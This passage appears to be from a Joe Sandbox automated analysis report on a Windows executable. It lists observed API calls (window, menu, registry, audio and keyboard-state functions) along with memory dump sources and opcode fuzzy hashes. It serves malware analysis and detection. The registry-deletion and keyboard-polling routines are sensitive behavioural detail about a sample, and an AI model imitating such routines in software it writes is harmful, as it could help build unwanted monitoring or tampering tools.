                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00E2313E
                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00E23145
                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00E23150
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                                                                                              • Opcode ID: e261f78895235b2d9caab2492a30c0657448d3d7d82739d76dd42c2370a7dbfd
                                                                                                                                                                              • Instruction ID: b32fecce9a84472e4826d47ac67771dce513c60167a2a134e3bca577476cb810
                                                                                                                                                                              • Opcode Fuzzy Hash: e261f78895235b2d9caab2492a30c0657448d3d7d82739d76dd42c2370a7dbfd
                                                                                                                                                                              • Instruction Fuzzy Hash: 7961F0B1904219AFCB04CFA4E888EAEBBB6FF48310F208519E555B7250D775AA418FA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00E052E6
                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00E05328
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E05339
                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00E05345
                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00E0537A
                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00E053B2
                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00E053EB
                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00E05445
                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00E05477
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00E054EF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                              • String ID: ThumbnailClass
                                                                                                                                                                              • API String ID: 1311036022-1241985126
                                                                                                                                                                              • Opcode ID: ac05c4fd7af23ebfd608bcb4acc408072078f67ff3291757bfd3aef2fc6c910e
                                                                                                                                                                              • Instruction ID: ad4329170f393e832147985a9bd25e6ff933faee1e3a22bfe08177cb7fbb6426
                                                                                                                                                                              • Opcode Fuzzy Hash: ac05c4fd7af23ebfd608bcb4acc408072078f67ff3291757bfd3aef2fc6c910e
                                                                                                                                                                              • Instruction Fuzzy Hash: 3591D372104B06AFD704DF24D895BABB7A9FF01308F105519FA96A20D1EB31ED95CFA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetMenuItemInfoW.USER32(00E729C0,000000FF,00000000,00000030), ref: 00E0C973
                                                                                                                                                                              • SetMenuItemInfoW.USER32(00E729C0,00000004,00000000,00000030), ref: 00E0C9A8
                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00E0C9BA
                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 00E0CA00
                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00E0CA1D
                                                                                                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00E0CA49
                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 00E0CA90
                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E0CAD6
                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E0CAEB
                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E0CB0C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 1460738036-4108050209
                                                                                                                                                                              • Opcode ID: 27e8db84d4b128eb27b6001ad3b891bfd2ac770c5ff3dcd046b85919e273104a
                                                                                                                                                                              • Instruction ID: 56ab0d40137b6952184be01422959a514d65432b89dfc984306d216c9365b3c8
                                                                                                                                                                              • Opcode Fuzzy Hash: 27e8db84d4b128eb27b6001ad3b891bfd2ac770c5ff3dcd046b85919e273104a
                                                                                                                                                                              • Instruction Fuzzy Hash: 2A618E70A0024AAFDF11CFA4DC89AFE7BB8FB05348F241615E956B3191D730AD85CB61
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E0E4D4
                                                                                                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E0E4FA
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0E504
                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00E0E554
                                                                                                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E0E570
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                              • API String ID: 1939486746-1459072770
                                                                                                                                                                              • Opcode ID: 661607ba414fc3a297254029bf83adab4a30be65c710091a0fffba88c08230ed
                                                                                                                                                                              • Instruction ID: 668ceead7bbef1f0ff442cd29bd316dd96091e06257654854bd22de558245e1d
                                                                                                                                                                              • Opcode Fuzzy Hash: 661607ba414fc3a297254029bf83adab4a30be65c710091a0fffba88c08230ed
                                                                                                                                                                              • Instruction Fuzzy Hash: DB413432544319BAEB00ABA4AC0BFBFBB6CDF51310F10156AF900B71C2EB759A4192B1
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E2D6C4
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00E2D6ED
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E2D7A8
                                                                                                                                                                                • Part of subcall function 00E2D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00E2D70A
                                                                                                                                                                                • Part of subcall function 00E2D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00E2D71D
                                                                                                                                                                                • Part of subcall function 00E2D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E2D72F
                                                                                                                                                                                • Part of subcall function 00E2D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E2D765
                                                                                                                                                                                • Part of subcall function 00E2D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E2D788
                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E2D753
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                              • API String ID: 2734957052-4033151799
                                                                                                                                                                              • Opcode ID: b358e42fc00f91d82fb4cce8af2343056d4178cc42bf9fd4fdbf935011789039
                                                                                                                                                                              • Instruction ID: d6c371008b187f013afad4bb0496a162849f56fc481846cd5e91ff91a5bb602f
                                                                                                                                                                              • Opcode Fuzzy Hash: b358e42fc00f91d82fb4cce8af2343056d4178cc42bf9fd4fdbf935011789039
                                                                                                                                                                              • Instruction Fuzzy Hash: 85318E7590512CBFDB219B91EC88EFFBB7CEF46754F000166B905F3140DA749E499AA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • timeGetTime.WINMM ref: 00E0EFCB
                                                                                                                                                                                • Part of subcall function 00DBF215: timeGetTime.WINMM(?,?,00E0EFEB), ref: 00DBF219
                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00E0EFF8
                                                                                                                                                                              • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00E0F01C
                                                                                                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E0F03E
                                                                                                                                                                              • SetActiveWindow.USER32 ref: 00E0F05D
                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E0F06B
                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E0F08A
                                                                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 00E0F095
                                                                                                                                                                              • IsWindow.USER32 ref: 00E0F0A1
                                                                                                                                                                              • EndDialog.USER32(00000000), ref: 00E0F0B2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                              • String ID: BUTTON
                                                                                                                                                                              • API String ID: 1194449130-3405671355
                                                                                                                                                                              • Opcode ID: ae28fdf126f2302c01f16c4d5d72a76b9fd92c99df41e6e9f873f52e8a1cad59
                                                                                                                                                                              • Instruction ID: b6951635713acd4de3692421856d1ff9bf5d3c09ea2bcc57602fd8c787abc430
                                                                                                                                                                              • Opcode Fuzzy Hash: ae28fdf126f2302c01f16c4d5d72a76b9fd92c99df41e6e9f873f52e8a1cad59
                                                                                                                                                                              • Instruction Fuzzy Hash: 04219271204209BFE721BF72FC8DA267FA9E744749B006025F509B22B2CB714DD99622
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E0F374
                                                                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E0F38A
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E0F39B
                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E0F3AD
                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E0F3BE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: SendString$_wcslen
                                                                                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                              • API String ID: 2420728520-1007645807
                                                                                                                                                                              • Opcode ID: b9d47aa16f87d1fcdeb5ddde9181335d8618c595e13caabc3ca8b9994733b66c
                                                                                                                                                                              • Instruction ID: 82f861963821d61e16f48eec1bda7b47e0d6902fb1d7196740af52ca8fdb1e89
                                                                                                                                                                              • Opcode Fuzzy Hash: b9d47aa16f87d1fcdeb5ddde9181335d8618c595e13caabc3ca8b9994733b66c
                                                                                                                                                                              • Instruction Fuzzy Hash: D6110631A9025979D720A365DC0AEFF7ABCEBD2B94F00253AB401F20D1EBA05D45C6B0
                                                                                                                                                                              APIs
                                                                                                                                                                              • _free.LIBCMT ref: 00DD3007
                                                                                                                                                                                • Part of subcall function 00DD2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4), ref: 00DD2D4E
                                                                                                                                                                                • Part of subcall function 00DD2D38: GetLastError.KERNEL32(00E71DC4,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4,00E71DC4), ref: 00DD2D60
                                                                                                                                                                              • _free.LIBCMT ref: 00DD3013
                                                                                                                                                                              • _free.LIBCMT ref: 00DD301E
                                                                                                                                                                              • _free.LIBCMT ref: 00DD3029
                                                                                                                                                                              • _free.LIBCMT ref: 00DD3034
                                                                                                                                                                              • _free.LIBCMT ref: 00DD303F
                                                                                                                                                                              • _free.LIBCMT ref: 00DD304A
                                                                                                                                                                              • _free.LIBCMT ref: 00DD3055
                                                                                                                                                                              • _free.LIBCMT ref: 00DD3060
                                                                                                                                                                              • _free.LIBCMT ref: 00DD306E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                              • String ID: &
                                                                                                                                                                              • API String ID: 776569668-2586148540
                                                                                                                                                                              • Opcode ID: 904e79a7bed52a75d320d364f1680fc23101e3f1b816aef4463e8d898cfb993a
                                                                                                                                                                              • Instruction ID: 1f9a2c7f84b91f0a275d3d5c20d7b91873dd30066f1733b069c8cb6c89d44d36
                                                                                                                                                                              • Opcode Fuzzy Hash: 904e79a7bed52a75d320d364f1680fc23101e3f1b816aef4463e8d898cfb993a
                                                                                                                                                                              • Instruction Fuzzy Hash: 6D115676510108BFCB01EF95C942DED3BA6EF15350BA145A6FA089F222DA31EF519BB0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00E0A9D9
                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00E0AA44
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00E0AA64
                                                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 00E0AA7B
                                                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00E0AAAA
                                                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 00E0AABB
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00E0AAE7
                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 00E0AAF5
                                                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00E0AB1E
                                                                                                                                                                              • GetKeyState.USER32(00000012), ref: 00E0AB2C
                                                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00E0AB55
                                                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00E0AB63
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                                                              • Opcode ID: 68f7451164328ba1d6d62881d3489f610cd5db593243a91430dda62f08d4b6d2
                                                                                                                                                                              • Instruction ID: caaf33c762b1b8d9c1bcde839dff3b8e5b6001e61b2ecdd66ad86591e639c16a
                                                                                                                                                                              • Opcode Fuzzy Hash: 68f7451164328ba1d6d62881d3489f610cd5db593243a91430dda62f08d4b6d2
                                                                                                                                                                              • Instruction Fuzzy Hash: 7E51F720A0478C29FB35D7609854BEABFF59F51348F4C55A9C5C22B1C2DA649BCCCB63
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00E06649
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00E06662
                                                                                                                                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E066C0
                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00E066D0
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00E066E2
                                                                                                                                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E06736
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00E06744
                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00E06756
                                                                                                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E06798
                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00E067AB
                                                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E067C1
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00E067CE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3096461208-0
                                                                                                                                                                              • Opcode ID: beb0e0377ab55e75ad8c7b39102993afb9ba4adc4243af0f7a7cb66a3901176a
                                                                                                                                                                              • Instruction ID: 97275ec8f3c903f32006ce0a0c36913557fe2726780c5f6c42066fe45884f62e
                                                                                                                                                                              • Opcode Fuzzy Hash: beb0e0377ab55e75ad8c7b39102993afb9ba4adc4243af0f7a7cb66a3901176a
                                                                                                                                                                              • Instruction Fuzzy Hash: 74510DB1A00209AFDB18CF69DD89BAEBBB5FB48314F148129F919F7290D7709E548B50
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA2234: GetWindowLongW.USER32(?,000000EB), ref: 00DA2242
                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00DA2152
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ColorLongWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 259745315-0
                                                                                                                                                                              • Opcode ID: 7c732a6dceb59a77cb1a25a4080f153fb963e7135324da3fc79b596ef89fadee
                                                                                                                                                                              • Instruction ID: 6d8cc26a2097aebdd4d7e777796404b8a5a904e8f0e216845c92aa07e031ac82
                                                                                                                                                                              • Opcode Fuzzy Hash: 7c732a6dceb59a77cb1a25a4080f153fb963e7135324da3fc79b596ef89fadee
                                                                                                                                                                              • Instruction Fuzzy Hash: 8341B431205784AFDB255F3E9C48BB93B75AB42330F194659FAA29B2E1C7318D42DB20
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00DE28D1
                                                                                                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00DE28EA
                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00DE28FA
                                                                                                                                                                              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00DE2912
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DE2933
                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DA11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00DE2942
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DE295F
                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00DA11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00DE296E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
